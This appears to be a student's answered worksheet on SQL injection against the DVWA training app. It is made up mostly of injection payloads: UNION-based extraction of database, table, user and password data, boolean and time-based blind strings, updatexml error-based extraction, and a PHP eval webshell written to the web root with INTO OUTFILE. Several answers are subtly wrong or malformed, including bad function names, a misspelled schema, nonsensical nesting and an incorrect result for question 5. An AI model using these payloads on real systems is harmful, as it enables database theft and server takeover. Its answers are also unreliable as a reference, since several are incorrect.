1. What are the common closing methods?
Single quote, double quote, parentheses, combinations of the above, and the numeric type
2. Steps for loading the payload and the corresponding SQL (write the corresponding numbered payload in the answer area)
| Step | Corresponding SQL |
| --- | --- |
| Detect the closing method | 1 1' or 1=1 -- |
| Detect the number of columns after SELECT | 2 1' order by 1 (2,3...) -- |
| Make the original result display empty | 3 1' and 1=2 -- |
| Detect which SELECT columns are shown on the page | 4 1' and 1=2 union select 1,2,3 -- |
| Extract the database name, user name and version | 5 1' and 1=2 union select database(),users(),version -- |
| Show the database name, user name and version in a single text box, separated by ":" | 6 1' and 1=2 union select database(),users(),version |
| Query the set of tables in the Mysql database | 7 1' and 1=2 union select table_name,1 from information_schema.tables where table_schema='Mysql' -- |
| Query the columns of the database's user table | 8 1' and 1=2 union select column_name,1 from information_schema.columns where table_schema='dvwa' and table_name='users' -- |
| Query the actual username and password data in the user table | 9 1' and 1=2 union select username,password from users -- |
| One-line webshell | 10 select 1,"<?php eval($_POST['123'])?>" into outfile 'D:\\xampp\\htdocs\\dvwa\\aa.php' |
3. Boolean-based blind injection payloads? (at least three)
1' and 1=if(length(database())>8,1,2) %23
1' and 1=if(length(ascii(substr(database(),1,1))>128,1,2) %23
1' and 1=if(length(ascii(substr(select table_name from information.tables where table_schema='databasename')))>128,1,2) %23
4. Time-based blind injection payloads? (at least three)
1' and 1=if(length(database())>8,sleep(1),sleep(5)) %23
1' and 1=if(length(ascii(substr(database(),1,1))>128, sleep(1),sleep(5)) %23
1' and 1=if(length(ascii(substr(select table_name from information.tables where table_schema='databasename')))>128, sleep(1),sleep(5)) %23
5. What is the output of select * from tablename where id=1 or 1=1 and 1=2?
null
6. What is the output of select * from tablename where id=1 and 1=2 or 1=1?
The whole table
7. How is the error-reporting function updatexml() used to obtain the database name?
updatexml(1,concat('['database(),']'),0)
8. update users set password='$password' where name='$admin'
How should the parameters $password and $admin be passed to the above statement to obtain the database name?
password='$password'1' and 1=2 union select database() --
9. insert into user (id,username,password) values (2,$username,3);
How should the parameter $username be passed to the above statement to obtain the database name?
updatexml(1,concat('['database(),']'),0)
10. TVNVeVlqRWxNMFFsZFVaR01VWT0%3D
1+1=?